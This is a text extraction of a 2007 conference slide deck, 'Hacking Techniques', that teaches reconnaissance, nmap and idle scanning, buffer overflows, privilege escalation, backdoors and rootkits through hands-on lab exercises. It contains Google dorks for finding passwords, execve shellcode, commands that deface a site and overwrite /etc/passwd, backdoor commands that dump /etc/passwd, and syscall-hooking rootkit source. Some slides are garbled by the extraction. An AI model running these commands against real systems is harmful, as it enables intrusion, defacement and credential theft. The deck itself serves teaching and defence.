You are on page 1of 84

Hacking Techniques

by Michael Hamm

01./02.02.2007

linuxdays.lu 2007

1

Hacking Techniques

01./02.02.2007

linuxdays.lu 2007

2

Hacking Techniques

Attackers
Hackers Spies Terrorists Insider Prof. Crimminaly Vandals

Objectives
Challange, Status Political Gain Financial Gain Damage

01./02.02.2007

linuxdays.lu 2007

3

Hacking Techniques
Geek Hackers

Script Kiddies

Stupid Users

Automated Scripts / Viruses / Botnet / Spam

01./02.02.2007

linuxdays.lu 2007

4

lu 2007 5 ./02.Homebanking Data 01.Hacking Techniques - High profile targets: -.02.2007 linuxdays.Spam -.Banks -.Botnet -.Telecom / internet Provide --Private PC’s / Enduser -.Universities -.Military -.

02.lu 2007 of ce rvi Se ris ed 6 .2007 Vir us De the ial au ide r ap ft L top N ing tho linuxdays./02.Hacking Techniques Most often Security problems: (Source: CSI/FBI Computer Crime and Security Survey) ck Ha Ins A WL Un 01.

/02.Hacking Techniques ➤ Network based System Hacking ➤ Web Server Hacking ➤ Physically enter the Target Building ➤ WLAN (Wireless LAN) Hacking ➤ War Dialling ➤ Sniffing ➤ Social Engineering ➤ Viruses 01.2007 linuxdays.02.lu 2007 7 .

/02. passwd (password: test123) 10. Press >> b << to boot 7.rw /dev/hda4 8. passwd hamm ( password: test123) 9.Exercise: -. kernel /vmlinuz-2.sync 11.2007 linuxdays.mount –o remount.6.8 root=/dev/hda4 ro init=/bin/bash 5.shutdown –rn now 13. Select the kernel line and press >> e << 3.ro /dev/hda4 12. add >> init=/bin/bash << to the kernel line 4. Login as user hamm & launch vmware. Interupt the bootloader by pressing >> e << 2. Press >> Enter << 6. start all VM from top down 01.lu 2007 8 . mount –o remount.physical access = root rights -1.02.

Clearing Tracks 1./02. Scanning 3.2007 linuxdays. Reconnaissance 4. Maintaining Access 2. Gaining Access 01.02.lu 2007 9 .Hacking Techniques 5.

02.2007 linuxdays.Information Gathering -➤ visit targets’ websites ➤ review HTML Code. hidden directories. the best way to prepare is to write programs. 1989 „No. Programmers at Work Tempus Books.txt ➤ search for passwords. In my case. I went to the garbage cans at the Computer Science Centre and I fished out listings of their operating system.lu 2007 10 ./02. contact names ➤ Dumpster Diving Quotation Bill Gates in: Susan Lammers.Footprinting -.“ 01. JavaScript and Comments & robots. Reissue Edition. and to study great programs that other people have written.

Information Gathering -➤ whois request at the Network Information Centre -receive information about IP address ranges -Names and EMail addresses of responsibles whois -h whois.lu domainname: nserver: nserver: org-name: adm-email: tec-name: tec-email: linuxdays.tudor.lu Centre de Recherche Public Henri Tudor pierre.Footprinting -.2007 linuxdays.LACNIC (Latin America) 11 .lu Important whois domains: ./02.lu linuxdays.lu Xavier Detro xavier.dns.APNIC (Asia Pacific) .02.tudor.lu arthur.detro@tudor.ARIN (N-America & S-Africa) 01.RIPE (Europe & N-Africa) .plumer@crpht.lu 2007 .lu dorado.

168.lu > ls –d mumm.mumm.lu > set type=any > mumm. -try a zone transfer ➤ Footprinting by DNS: nslookup(1)./02. .Exercise Information Gathering -➤ DNS Lookup -use nslookup tools to receive informations about DNS& EMAIL Server.168. looking for names like Oracle.22. # nslookup > server 192.lu > set type=mx > mumm. dig(1). host(1).. TestLinux.22 mumm.lu 2007 .lu > exit # try zone transfer # Zonetransfer 12 # dig @192.lu axfr 01.22 > www...22.02.Footprinting -.2007 linuxdays.

RFC 2182 Secondary DNS Servers -.02.Smart Whois www.2007 linuxdays.all-nettools.RFC 1912 Common DNS Errors -./02.lu 2007 13 .com -.http://www.Netscan www.RFC 2219 Use of DNS Aliases 01.samspade.com -.Information Gathering -➤ whois tools: -.org -.GTWhois www.tamos.Sam Spade www.netscantools.Footprinting -.geektools.com/toolbox ➤ DNS must reads: -.com -.

2007 linuxdays.Information Gathering -➤ footprinting @ google ➤ news group articles of employees @<targetdomain> search business partners link:<targetdomain> site:<targetdomain> site:<targetdomain> site:<targetdomain> site:<targetdomain> site:<targetdomain> site:<targetdomain> site:<targetdomain> site:<targetdomain> intitle:index.of error | warning login | logon username | userid password admin | administrator inurl:backup | inurl:bak intranet ➤ ➤ ➤ ➤ ➤ ➤ ➤ ➤ ➤ 01.02./02.lu 2007 14 .Footprinting -.

heise.com/News/1127162 Index.02.ihackstuff.theregister.com 12.lu 2007 15 .co.uk/2001/11/28/the_google_attack_engine/ Link points to a Switch of a .of +banques +filetype:xls Johnny (I hack stuff) Long ‘Google Hacking for Penetration Testers’ Google Hacking Database http://johnny.2006 Chicago Tribune http://www.ww.de/newsticker/meldung/70752 2600 CIA Agents discovered via Search Engine 01.2007 linuxdays.gov Network Google not 'hackers' best friend‘ -./02.vnunet.03.Introduction -The Beginnings: www.Google Hacking -.

> intitle:<keyword> intext:<keyword> … … Google as an ‘Anonymous Proxy’ Google Cache &strip=1 01.lu 2007 16 .Google Hacking -.2007 linuxdays./02.02.Introduction -What to know: Advanced Operands: site:<domainname> inurl:<path> filetype:<xls|doc|pdf|mdb|ppt|rtf|…….

heise.sensepost.shows all websites NOT from the official Webserver -.de –site:www.de -. chat.de.www.maps nre hostnames without contacting target network -.lu 2007 17 .com/research_misc.SOAP Google API 01.de.wap.tb./02.heise.Introduction -What to know: The Power of combining Advanced Operands: site:heise.Google Hacking -.de.heise. www. … Offline Analysis of the search result: -.02.html -.heise.2007 linuxdays.

2007 linuxdays.Network Tools Ntop.Intranet Sites.ihackstuff. MRTG.lu 2007 18 .Databases 01.Error Messages of Scripts ‘Fatal error: call to undefined function’ –reply –the –next ‘Warning: Failed opening’ include_path -.bak -.Search for Backups filetype:bak inurl:php.of ws_ftp.02.asp ‘Post Date’ ‘From Country’ -.Search for: --.Directory Listings  Hidden/Private Files intitle:index. --.of. --.log -.admin intitle:index.Google Hacking -.Webcams.Printers.Introduction -What to find: The Google Hacking Database (johnny.com): -.of inurl:admin intitle:index. --.of ‘parent directory’ intitle:index./02.Search for vulnerable Scripts inurl:guestbook/guestbooklist. --.bak filetype:bak inurl:php.

enable password | secret "current configuration“ -intext:the 01.!Host=*. Analyse online product 3./02."index of/" "ws_ftp.02.ini" "parent directory“ -.ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-“ -. Find typical string 4. Find vulnerable websites Examples: -."admin account info" filetype:log -.bak mysql_connect mysql_select_db -.Google Hacking -. Security Problem deicovered on online product.Exercise -Livecycle of a Google Hack: 1. Create a google request 5.lu 2007 19 . 2.* intext:enc_UserPassword=* ext:pcf -.2007 linuxdays.inurl:php.

/02.lu 2007 20 .2007 linuxdays.02.Preparation anonymity doesn’t exist ➤ ➤ ➤ break systems in different countries / time zones install network multipurpose tools like netcat or backdoors hop from host to host to get anonymity 01.

Gaining Access 01.Hacking Techniques 5. Maintaining Access 2.lu 2007 21 ./02.2007 linuxdays. Reconnaissance 4. Scanning 3. Clearing Tracks 1.02.

2007 linuxdays.Goals -➤ mapping of the target network ➤ use system tools like traceroute & ping ➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route ➤ finding the range of IP addresses ➤ discerning the subnet mask ➤ identify network devices like firewalls & routers ➤ identify servers ➤ mapping of the reachable services ➤ detecting `live` hosts on target network ➤ discovering services / listening ports / portscan. ➤ identifying operating system & services ➤ identify application behind services & patch level 01.02./02. nmap.Scanning -.lu 2007 22 .

lu/27 # ICMP/TCP (send ICMP Echo Request and ACK to Port 80 if RST is received  host is alive / unfiltered ) # nmap –n –P0 –sU –g 53 –p 53 –T polite www.lu/27 ( UDP Scans are alomost NOT usefully.mumm./02.lu/27 (only do nslookup for the IP rage) # List Scan # nmap –-packet_trace –sP www.Scanning -. –sA.mumm. -sN.lu 2007 # not usable # today 23 . ACK.conf # nmap –sL www. -g 53 = sourceport -P0 = don’t PingScan first. -sX.mumm. -T polite = scan speed) -sF. Null-.2007 linuxdays.02.Network Mapping -Nmap: find living hosts $ su – # ns_mumm # cat /etc/resolve. FIN-. XMAS-.Scan 01.

22.21.24 # nmap –n –sT –P0 –p 110 192.168.168.22.Port Scanning -Nmap: port scan (connect scan) # nmap –n –sT –P0 –p 80 192.21.02./02.22.22.lu 2007 24 .Scanning -.24 SYN SYN/ACK ACK RST/ACK Port open SYN RST/ACK Port closed 01.2007 linuxdays.

Port Scanning -Nmap: port scan (stealth scan) # nmap –n –sS –P0 –p 80 192.21.22.22.2007 linuxdays.24 SYN SYN/ACK RST Port open SYN RST/ACK Port closed 01.Scanning -.21.168.24 # nmap –n –sS –P0 –p 110 192.lu 2007 25 .22.168.22./02.02.

443 192.22.2.168.80 192.ME.22.2007 linuxdays.80.22.2.168.24 Techniques to stay anonymous: silent scan: # nmap –n –sT –P0 –T sneaky –p 20-25.Scanning -.3 –p 80 <host> 01.02.3.168.22.80.Port Scanning -Nmap: port scan # nmap –n –sT –P0 –p 20-25.22.24 # nmap –n –sS –P0 –p 20-25.3.1.lu 2007 26 .3./02.22 fragmentation scan # nmap –n –P0 –f –p 20-25.2.22 decoy scan # nmap –n -P0 –D 1.1.2.443 192.21.168.1.80 192.21.22.

/02.lu 2007 27 .LU network: 01.02.2007 linuxdays.Scanning -.Exercise -Scan the MUMM.

IP-ID Idle Scan -Exercise: Who the hell is scanning you? target perform: # tcpdump –n –i eth0 host 192.168.<your IP Address> attacker perform: (idle_scan) 01.02.2007 linuxdays./02.lu 2007 28 .4.Advanced Scanning -.

Advanced Scanning -.you know how many packets he sends .by monitoring the IP ID value of a host .every new packet increases the IP ID Number .all packets have Fragment-ID Number .02.this is exploitable .example with hping2 –SA –p 80 –c 5 <switch ip> .this could be abused for zombie port scanning 01.2007 linuxdays.IP-ID Idle Scan -./02.based on IP-ID prediction .lu 2007 29 .by most systems IP ID + 1 .

IPID=2 IP-ID Probe -> SYN/ACK Response -> RST.Advanced Scanning -.lu 2007 30 . IPID=4 IP-ID Probe -> SYN/ACK Response -> RST. IPID=5 Zombie 01. verify quality of Zombie IP-ID Probe -> SYN/ACK Response -> RST.2007 linuxdays./02. IPID=3 IP-ID Probe -> SYN/ACK Response -> RST.02.IP-ID Idle Scan -Step 1: A) send SYN/ACK to Zombie B) investigate the answer IPID C) repeate A) and B) multiple times.

R C N/A K Target 01.lu 2007 31 .02. claim to be the Zombie B) open port: Target send SYN/ACK to Zombie C) open port: Zombie send RST and increase IPID to Target Zombie SYN.2007 linuxdays. Port=80.Advanced Scanning -./02. SRC IP = <zombie> SY 6 ID= IP ST.IP-ID Idle Scan -Step 2: A) Send SYN to target BUT spoof the Source IP Adress.

02.2007 linuxdays.Advanced Scanning -.lu 2007 32 .IP-ID Idle Scan -Step 2: A) Send SYN to target BUT spoof the Source IP Adress. SRC IP = <zombie> RS T Target 01. claim to be the Zombie B) close port: Target simply send a RST to the Zombie Zombie SYN./02. Port=80.

02./02.IP-ID Idle Scan -Step 3: A) send SYN/ACK to Zombie B) investigate the answer IPID If IPID = 6  port was close If IPID = 7  port was open IP-ID Probe -> SYN/ACK Response -> RST.2007 linuxdays. IPID=7 Zombie 01.Advanced Scanning -.lu 2007 33 .

443 –sI 10.80.10./02.02.80.11 01.10 10.IP-ID Idle Scan -IP ID Idle Scan with nmap # nmap –n –P0 –p20-25.2007 linuxdays.Advanced Scanning -.10.10.lu 2007 34 .11.443 –sI <zombie> <target> # nmap –n –P0 –p20-25.

22.168.identifying Server-Software.25 # nmap –n –p 20-25.identifying service / protocoll.80.22.identifying additional Modules etc./02.2007 linuxdays.What services are bound to the port: -.22.443 –sV 192.02.lu 2007 35 .168. -.25 # amap –B –i scan1 # amap –i scan1 01.Scanning -.80. -.Identifying Services -Banner Grabbing & Version Mapping: .22.443 –oM scan1 192. -. automatic approach # nmap –n –p 20-25.identifying Version Number.

02.0 OS Detection # nmap –O 192.0 # nc 192.168.168.168.22.22 # xprobe2 –p tcp:443:open 192./02.168.22.Scanning -.22.2007 linuxdays.22.Identifying Services -Banner Grabbing & Version Mapping: manual approach with Netcat # nc 192.22.22 01.22 22 # nc 192.21 80 HEAD / HTTP/1.22.168.lu 2007 36 .25 # xprobe2 192.22.168.22 80 HEAD / HTTP/1.22.21 21 # nc 192.168.

/02. Scanning 3. Reconnaissance 4.02. Clearing Tracks 1.lu 2007 37 . Maintaining Access 2. Gaining Access 01.Hacking Techniques 5.2007 linuxdays.

do we know a vulnerability -.Gaining Access -.overview of the network topology -. common misconfigurations -.services in use. version numbers How to proceed: -. partners. emplyees) -.ideal: fire one single attack 01.Where are we now -At this point we know (without doing something illegal at all): -./02.is there a known vulnerability -.overview of live servers and open ports -.research on internet for known security holes -.Targets business (products.setup a test environment to practice the attack -.2007 linuxdays.02.default passwords.lu 2007 38 .default passwords prepare attack -. server-software.known configuration problems -.

lu 2007 39 .02./02.prepare attack -- 01.Gaining Access -.2007 linuxdays.

2007 linuxdays.prepare attack -- 01.02./02.Gaining Access -.lu 2007 40 .

02.prepare attack -- 01.lu 2007 41 .Gaining Access -./02.2007 linuxdays.

02.lu 2007 42 .2007 linuxdays.prepare attack -- 01.Gaining Access -./02.

Buffer Overflow -➤ ➤ ➤ ➤ ➤ Stack Based Buffer Overflows Off-by-One Overflows Frame Pointer Overwrites BSS Overflows Heap Overflows 01.2007 linuxdays.Gaining Access -.lu 2007 43 .02./02.

gets(name).lu 2007 44 .02. printf("Hello. name). printf("Please type your name: ").Gaining Access -./02. return 0. %s". } Buffer overflow occur if you enter `1234567890123456789012345678901234567890` 01.Stack Based Buffer Overflow -➤ C/C++ problem ➤ programming error ➤ Copy to much variable user input into fixed sized buffer #include <stdio.2007 linuxdays.h> int main() { char name[31].

Gaining Access -.02.Mutiple „unsafe“ functions in libc -.2007 linuxdays.Executing code in the data/stack segment -.lu 2007 ./02.Missing bounds checking -.Creating the to be feed to the application Memory layout of a process: LIFO – top of the stack Stack high address no ‘execution’ attribute set ‘read-only’ attribute Heap BSS Data Code low address 45 01.Stack Based Buffer Overflow -Exploitation: -.

Stack is created at the beginning of a function -. ] } int main (void) { int a.LIFO mechanism to pass arguments to functions and to reference local variables void function (void) { [ .lu 2007 46 01..02.Stack is released at the end of a function -..data to recover previous frame Stack Frame 1 Frame 2 EBP POP ESP PUSH EIP: Extended Instruction Pointer EBP: Extended Base Pointer ESP: Extended Stack Pointer linuxdays.Stack Based Buffer Overflow --. function (argv[1]) [ ./02.Stack holding all the information for the function -.Gaining Access -.. ] } ..local variables .function parameters .2007 .

Gaining Access -- Stack Based Buffer Overflow -void 3 function (char *args) { 4 char buff[512]; strcpy (buff, args); }

Stack
args Return Address SFP saved registers local variables args Return Address SFP saved registers local variables

main () Frame 1

EIP

int 1 main (int argc, char *argv[]) EIP { if (argc > 1) EBP function () { Frame 2 function (argv[1]); 2 } else buff[512] printf ("no input\n"); ESP return 0; } EIP: Extended Instruction Pointer EBP: Extended Base Pointer ESP: Extended Stack Pointer
01./02.02.2007 linuxdays.lu 2007 47

Gaining Access -- Stack Based Buffer Overflow -void 3 function (char *args) { 4 char buff[512]; strcpy (buff, args); 5 }

Stack
args Return Address EBP saved registers local variables args Wrong Return SFP saved registers buff[512]

main () Frame 1

int 1 main (int argc, char *argv[]) { if (argc > 1) function () { Frame 2 function (argv[1]); 2 } else printf ("no input\n"); return 0; }

01./02.02.2007

linuxdays.lu 2007

48

Gaining Access -- Stack Based Buffer Overflow -void function (char *args) { char buff[512]; strcpy (buff, args); }

3 4 5 6

Stack
args Return Address EBP saved registers local variables args Wrong Return SFP saved registers buff[512]

main () Frame 1

int 1 main (int argc, char *argv[]) { if (argc > 1) function () { Frame 2 function (argv[1]); 2 } else printf ("no input\n"); return 0; }

01./02.02.2007

linuxdays.lu 2007

49

Gaining Access -- Stack Based Buffer Overflow -void function (char *args) { char buff[512]; strcpy (buff, args); }

3 4 5 6

Stack

main () Frame 1 0x0A00 0x0A00 0x0A00 0x0A00 shellcode shellcode nop nop

int 1 main (int argc, char *argv[]) { if (argc > 1) function () { Frame 2 function (argv[1]); 2 } else printf ("no input\n"); return 0; }

0x0C00 0x0A00 0x0800

01./02.02.2007

linuxdays.lu 2007

50

%ebx pushl %eax pushl %ebx movl %esp.2007 linuxdays.%a1 int $0x80 */ */ */ */ */ */ */ */ */ */ */ Old school payload: bindshell.Shellcode -char linux_ia32_shellcode[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" /* /* /* /* /* /* /* /* /* /* /* xorl %eax.Gaining Access -./02.02. backconnect 01.%ecx cdql movb $0x0b.%eax pushl %eax pushl $0x68732f2f pushl $0x6e69622f movl %esp.lu 2007 51 .

/02./openSSL 0x73 192.Unprivileged user -> local user privileges escalation 01.Gaining Access -..02.Exercise: Web Site defacement -$ cd /home/hamm/ssl/ $ ls –la $ . " > /var/www/html/index.2007 linuxdays.html .22.168.lu 2007 52 .21 443 –c 40 /usr/bin/whoami echo "hacked by me….

Exercise: Web Site defacement -What do we see on the Firewall??? 01./02.lu 2007 53 .02.2007 linuxdays.Gaining Access -.

rm . scripts./02.lu 2007 54 .2007 linuxdays.02.why they are so vulnerable -➤ complex application ➤ multiple subsystems: application server.Gaining Access primary target webserver -. sql-server ➤ self made applications: programmers don’t know how to write secure code ➤ Shell-Command-Injection: bypass commands through the shell Input: "Alice.rf" ➤ SQL-Injection bypass SQL Commands by User input Input: "User=Alice' -&Pass=Idontknow" 01.

Maintaining Access 2.2007 linuxdays.Hacking Techniques 5. Scanning 3.lu 2007 55 .02./02. Gaining Access 01. Reconnaissance 4. Clearing Tracks 1.

be silent -- ➤ after a successful initial attack ➤ hide the tracks from logfiles ➤ expand local rights.02.Maintaining Access -. find vulnerabilities in network ➤ install rootkits.lu 2007 56 ./02.2007 linuxdays. start network sniffer ➤ try same password on other systems ➤ find problems in topology (ex. dual homed hosts) ➤ try to attack the private network 01. steal password database.

lu 2007 57 .local software vulnerabilities -.02.privileged process .2007 linuxdays./02.buffer overflow -.Maintaining Access Privileges Escalation -.race condition -.password file Source of problems? .SUID / SGID binaries find / -perm –4000 –type f –user root –print find / -perm –2000 –type f –group root –print .configuration error .format string 01.Kernel .Race Condition -what could I try to attack? .

Maintaining Access Privileges Escalation -.02. argv[1]).lu 2007 58 .h> int main (int argc. "%s\n". } 01.h> #include <unistd. char *argv[]) { char path[] = "/tmp/race.2007 linuxdays. "a+"). unlink (path). fclose (fp).txt" FILE *fp./02. fprintf (fp. fp = fopen (path.example: race_bug -#include <stdio. return 0.

02.example: race_bug -Prepare attack $ $ $ $ $ $ cd /home/hamm/race ls –la .Maintaining Access Privileges Escalation -. exit Attak: $ $ $ $ $ $ $ # ln –s /etc/passwd /tmp/race.lu 2007 59 .2007 linuxdays./command ls –la /tmp cat /etc/passwd su – bimbam id 01.bak. cp /etc/passwd /etc/passwd.txt ls –la /tmp cat command ./02./race_bug test ls –la /tmp cat /etc/passwd su -.

22./openSSL 0x73 192.x quit ls –l chmod +x p ls –l ./p whoami 01.168.1 mode binary # local root exploit get p # kernel 2.22.2./02.Maintaining Access Privileges Escalation -.168.lu 2007 60 .Exercise: privileges escalation -$ # # # # # $ su – cd /home/hamm/ssl/ ls –la cp p /tftpboot /etc/init.02.x 2.d/atftpd start exit .21 443 –c 40 /usr/bin/whoami pwd /usr/bin/tftp 192.2007 linuxdays.4.

send trigger pkg1 -.lu 2007 61 Port 80.introduction -Aka Port Knocking Back Door . statefull .trigger for special packets to get activated .raw sockets .example: Sadoor http://cmn.send trigger pkg2 -. no open ports .listptojects./02.Open Port????? .02.send trigger pkg3 -. 443 open.attacker: -.send command pkg1 .darklab.2007 linuxdays.no promisc mode.org 01.Maintaining Access Port Knocking -.

2007 linuxdays.168.22. } # key 2 keypkt { ip { } } daddr = 192.24. } 01.Sadoor example -Sadoor daemon configuration: /etc/sadoor/sadoor.24.168.02.22. saddr = 192. icmp { type = 8. sport = 3456.168.168.22.22./02.1. tcp { flags = SYN.pkts # key 1 keypkt { ip { } } daddr = 192. dport = 80.lu 2007 62 .1.Maintaining Access Port Knocking -. saddr = 192.

168.Maintaining Access Port Knocking -.24.22.Sadoor example -Sadoor daemon configuration: /etc/sadoor/sadoor. udp { dport = 111. saddr = 192. tcp { sport = 80.1.1.168.168. sport = 12345.168.24.22. data { bim\x20bam } } # command cmdpkt { ip { } } daddr = 192.lu 2007 63 .22.pkts # key 3 keypkt { ip { } } daddr = 192./02.02.22.2007 linuxdays. saddr = 192. } 01.

sash mksadb mv sadoor.02.Maintaining Access Port Knocking -.db /var/www/html/ chmod 644 /var/www/html/sadoor./02.2007 linuxdays.Sadoor example -Create a config-image database and download it to /home/hamm/.lu 2007 64 .db Run the daemon /usr/sbin/sadoor Review logging tail –f /etc/sadoor/sadoor.log 01.

22.02.lu/sadoor.sash mv /home/hamm/sadoor. become root cd cd .168.Sadoor example -ON CLIENT side: 1.24 –vv sh-2.24 "chmod 644 /var/www/html/test.db rm –f sadoor.22.05b# exit 01.lu 2007 65 ./02.05b# whoami sh-2. Establish a connection / remote shell sash 192.05b# /sbin/ifconfig sh-2.168.Maintaining Access Port Knocking -.24 \ –vv –r "cat /etc/passwd > /var/www/html/test.mumm.22.db .txt" 4.db 2. Sending commands # create encrypted db # delete plain sequence sash 192. sadbcat sadoor.db 3.168.2007 linuxdays. Download http://testwww.db sash.txt" sash 192.

/02.lu 2007 66 . Gaining Access 01. Maintaining Access 2. Reconnaissance 4.Hacking Techniques 5.2007 linuxdays. Scanning 3.02. Clearing Tracks 1.

2007 linuxdays.from user input 01./02.Clearing Tracks Rootkits -.from network -.collect sensitive data -.network activities .let the attacker become root whenever he want .lu 2007 67 .introduction -Main goals of a rootkit: .active processes -.provide a backdoor to the system .directories & files -.hide activities of an attacker to the legal administrator -.02.

netstat(1).IP Addresses -.easy to discover: -.examples: Irk3-6. locate(1).. .ifconfig(1)./02. ….defined parameters will become invisible in the future: -. who(1). ps(1).lu 2007 68 .replace important system tools by modified versions: -.2007 linuxdays. -.Clearing Tracks Rootkits -.aide .02. w(1). Solaris Rootkit 01.tripwire.by filesystem inegrity checker: -. (Linux).usernames . Fbrk (FreeBSD). -.directories & files -.introduction -1th generation: Binary Rootkits .du(1). top(1).

2007 linuxdays./02.infecting existing modules .introduction -2th generation: LKM (Loadable Kernel Modules) Rootkits .can be loaded dynamically: insmod(3).expand the functionality of the kernel .implemented as device driver -> high level of flexibility .result: trojaned kernel  full control over all userland apps.02.Clearing Tracks Rootkits -. 01.implementations: -. rmmod(3) .new modules -.lu 2007 69 .

02.syscalls: a gate between userland and kernel .lu 2007 70 .example for syscalls: trace /bin/ls execve(… uname(… brk(0) old_mmap(… access(… open(… open(… … … 01.introduction -2th generation: LKM (Loadable Kernel Modules) Rootkits .Clearing Tracks Rootkits -.2007 linuxdays./02.

02.Clearing Tracks Rootkits -.lu 2007 71 .2007 linuxdays.normal syscall: parameter into registers Userland Kernel selection of the interrupt handler Interrupt handler: syscall selection Exec syscall example: mkdir int 80 Interrupt Descriptor Table (IDT) Syscall Table 01./02.introduction -2th generation: LKM (Loadable Kernel Modules) Rootkits .

2007 linuxdays./02.lu 2007 72 .manipulated syscall: parameter into registers Userland Kernel selection of the interrupt handler Interrupt handler: syscall selection Exec syscall Exec syscall example: mkdir manipluated: mkdir int 80 Interrupt Descriptor Table (IDT) Syscall Table 01.Clearing Tracks Rootkits -.introduction -2th generation: LKM (Loadable Kernel Modules) Rootkits .02.

h> /* the new mkdir syscall */ int hack_mkdir (const char *path) printk ("BimBam!\n").02.h> <linux/kernel. } void cleanup_module (void) { sys_call_table[SYS_mkdir]=hack_mkdir. /* dummy for old mkdir syscall */ int (*orig_mkdir) (const char *path).introduction -2th generation: LKM Rootkit: Exercise: mkdir_Rootkit #define MODULE #define __KERNEL__ #include #include #include #include #include <linux/module.h> <linux/version. } 01. sys_call_table[SYS_mkdir]=hack_mkdir./02. return 0.h> <stdio.lu 2007 73 .h> <sys/syscall. } { MODULE_LICENSE("GPL").Clearing Tracks Rootkits -. return 0.2007 linuxdays. int init_module (void) { orig_mkdir=sys_call_table[SYS_mkdir]. /* import syscall table */ extern void *sys_call_table[].

Clearing Tracks Rootkits -.lu 2007 74 ./02.02.o lsmod mkdir test ls –la cat /var/log/messages rmmod mkdir lsmod mkdir test ls –la 01.introduction -2th generation: LKM Rootkit: Exercise: mkdir_Rootkit cd /root/rootkit/mkdir gcc –c –I /usr/src/linux/include mkdir.c insmod mkdir.2007 linuxdays.

o lsmod insmod cleaner./ava h /root/rootkit/bimbam ls –la /root/rootkit ./ava i <PID SSHD> ps aux | grep ssh netstat –punta | grep 22 mkdir /root/rootkit/bimbam ./02.lu 2007 75 ./ava –U dummy 01.2007 linuxdays.introduction -2th generation: LKM Rootkit: Adore cd /root/rootkit/adore/ insmod adore.o lsmod rmmod cleaner lsmod ps aux | grep ssh .Clearing Tracks Rootkits -.02.

Red Hat 8.02./02.all Syscalls which access the Filesystem make use of the Virtual File System .0 (Kernel 2.41  .2007 linuxdays.5.Kernel 2.existing Handler-Routines are replaced by modified one  files/folder could be hidden  via /proc hidding of processes 01.18) -.4.in Unix.sys_call_table is not exported anymore -.lu 2007 76 .introduction -3th generation: (Virtual File System) VFS Layer Rootkit . most of all is handled like a file .Clearing Tracks Rootkits -.

Clearing Tracks Rootkits -../02.introduction -3th generation: (Virtual File System) VFS Layer Rootkit parameter into registers Userland Kernel int 80 selection of the interrupt handler Interrupt handler: syscall selection Syscall VFS ext2/ ext3/ .2007 linuxdays. Interrupt Descriptor Table (IDT) Syscall Table 01.02.lu 2007 77 ..

02.2007 linuxdays./02.lu 2007 78 .Hacking Techniques Insider Attacks 01.

10.02.10.99 99:99:99:99:99:99 01./02.1 Sender MAC addr: 99:99:99:99:99:99 IP: MAC: 10.Password Sniffing true a Switch -Default Gateway IP: 10.10.10.10.10.2 MAC: 22:22:22:22:22:22 ARP Reply IP 10.lu 2007 79 .2007 linuxdays. BUT directed ARP: ETHERNET II Dst: 22:22:22:22:22:22 SRC: 99:99:99:99:99:99 ARP reply: Sender IP addr: 10.10.Insider Attacks -.1 MAC 99:99:99:99:99:99 No gratuitous ARP.1 MAC: 11:11:11:11:11:11 Attacked PC IP: 10.10.10.10.

168.___.3. arpspoof –i eth0 –t 192.___.4.Insider Attacks -.28 3.___ MAC: __:__:__:__:__:__ 01.___.168.4 IP: ___.3.Password Sniffing true a Switch -Exercise: 1. dsniff -cn Telnet Client: IP: 192.___.30 192.2007 linuxdays.4.___.___ Attacker: IP: 192.168.___ Telnet Server: IP: 192.2 MAC: 00:08:74:B3:BB:F1 IP: ___.02. echo 1 > /proc/sys/net/ipv4/ip_forward 2.lu 2007 80 .___.3 IP: ___./02.168.168.3.

2 DNS Response (server_xyz./02. 192.2007 linuxdays. Attacker: IP: 192.xx Default Gateway: IP: 192.3.02.168.64.lu) Target: SSH Client: IP: 192.2) 01.by DNS Spoofing -SSH Server: IP: 192.lu 2007 81 .lu.3.168.1 DNS Server: IP: 158.4.168.3.3.168.3 DNS Query (HOST: server_xyz.Insider Attacks SSH MitM Attack -.3.168.

lu 2007 82 .Insider Attacks SSH MitM Attack -./02.02.by DNS Spoofing -- 01.2007 linuxdays.

02.2007 linuxdays.3.1 DNS Server: IP: 158.3.by DNS Spoofing -SSH Server: IP: 192.3 Target: SSH Client: IP: 192.2 01. Attacker: IP: 192./02.xx Default Gateway: IP: 192.3.168.4.168.168.64.lu 2007 83 .Insider Attacks SSH MitM Attack -.168.3.

2007 linuxdays.Hacking for Admins by Michael Hamm 01./02.02.lu 2007 84 .